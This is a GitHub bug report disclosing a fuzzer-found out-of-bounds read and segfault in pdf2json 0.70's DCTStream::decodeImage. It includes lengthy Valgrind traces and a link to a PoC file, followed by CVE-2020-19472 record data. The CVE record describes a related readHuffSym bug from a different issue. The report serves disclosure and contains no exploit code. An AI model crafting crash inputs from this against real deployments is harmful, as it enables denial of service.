Hi, Our fuzzer found a bug due to an invalid read on the function DCTStream::decodeImage (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_aborted_DCTStream::decodeImage Valgrind says: ~~~ valgrind pdf2json $PoC /dev/null ==17382== Memcheck, a memory error detector ==17382== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==17382== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==17382== Command: ./pdf2json ./PoC_aborted_DCTStream::decodeImage /dev/null ==17382== Error: PDF file is damaged - attempting to reconstruct xref table... Error (15396): Illegal character <5c> in hex string Error (15407): Illegal character <78> in hex string Error (154): Dictionary key must be a name object Error (165): Dictionary key must be a name object Error (528): Dictionary key must be a name object Error (530): Dictionary key must be a name object Error (532): Dictionary key must be a name object Error (536): Dictionary key must be a name object Error (539): Dictionary key must be a name object Error (545): Dictionary key must be a name object Error (8015): Command token too long Error (8139): Missing 'endstream' Error (1970): Unknown DCT marker <75> ==17382== Invalid read of size 4 ==17382== at 0x435431: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x5b5bf10 is 0 bytes after a block of size 100,352 alloc'd ==17382== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==17382== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432BC5: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== ==17382== Invalid read of size 4 ==17382== at 0x435452: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x5b5bf14 is 4 bytes after a block of size 100,352 alloc'd ==17382== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==17382== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432BC5: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== ==17382== Invalid read of size 4 ==17382== at 0x43546F: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x5b5bf18 is 8 bytes after a block of size 100,352 alloc'd ==17382== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==17382== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432BC5: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== ==17382== Invalid read of size 4 ==17382== at 0x43548C: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x5b5bf1c is 12 bytes after a block of size 100,352 alloc'd ==17382== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==17382== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432BC5: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== ==17382== Invalid read of size 4 ==17382== at 0x4354A9: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x5b5bf20 is 16 bytes after a block of size 100,352 alloc'd ==17382== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==17382== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432BC5: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== ==17382== Invalid read of size 4 ==17382== at 0x4354C6: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x5b5bf24 is 20 bytes after a block of size 100,352 alloc'd ==17382== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==17382== by 0x48E521: gmalloc (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48E667: gmallocn (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432BC5: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== ==17382== Invalid read of size 4 ==17382== at 0x4354E3: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x5b5bf28 is 24 bytes after a block of size 100,352 in arena "client" ==17382== ==17382== Invalid read of size 4 ==17382== at 0x435500: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x5b5bf2c is 28 bytes after a block of size 100,352 in arena "client" ==17382== ==17382== Invalid read of size 1 ==17382== at 0x43698B: DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x43555E: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== Address 0x6feabb is not stack'd, malloc'd or (recently) free'd ==17382== ==17382== ==17382== Process terminating with default action of signal 11 (SIGSEGV) ==17382== Access not within mapped region at address 0x6FEABB ==17382== at 0x43698B: DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x43555E: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==17382== by 0x40269A: main (pdf2json.cc:275) ==17382== If you believe this happened as a result of a stack ==17382== overflow in your program's main thread (unlikely but ==17382== possible), you can try to increase the size of the ==17382== main thread stack using the --main-stacksize= flag. ==17382== The main thread stack size used in this run was 8388608. ==17382== ==17382== HEAP SUMMARY: ==17382== in use at exit: 518,164 bytes in 1,769 blocks ==17382== total heap usage: 1,978 allocs, 209 frees, 609,684 bytes allocated ==17382== ==17382== LEAK SUMMARY: ==17382== definitely lost: 16 bytes in 1 blocks ==17382== indirectly lost: 8 bytes in 1 blocks ==17382== possibly lost: 0 bytes in 0 blocks ==17382== still reachable: 518,140 bytes in 1,767 blocks ==17382== suppressed: 0 bytes in 0 blocks ==17382== Rerun with --leak-check=full to see details of leaked memory ==17382== ==17382== For counts of detected and suppressed errors, rerun with: -v ==17382== ERROR SUMMARY: 57 errors from 9 contexts (suppressed: 0 from 0) Segmentation fault ~~~ Thanks, Manh Dung
Aborted on DCTStream::decodeImage
https://api.github.com/repos/flexpaper/pdf2json/issues/32/comments
0
2019-05-28T23:23:25Z
2019-05-28T23:23:25Z
https://github.com/flexpaper/pdf2json/issues/32
449,519,854
32
2,220
CVE-2020-19472
2021-07-21T18:15:08.777
An issue has been found in function DCTStream::readHuffSym in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an invalid read of size 2 .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/33" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/flexpaper/pdf2json/issues/33
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
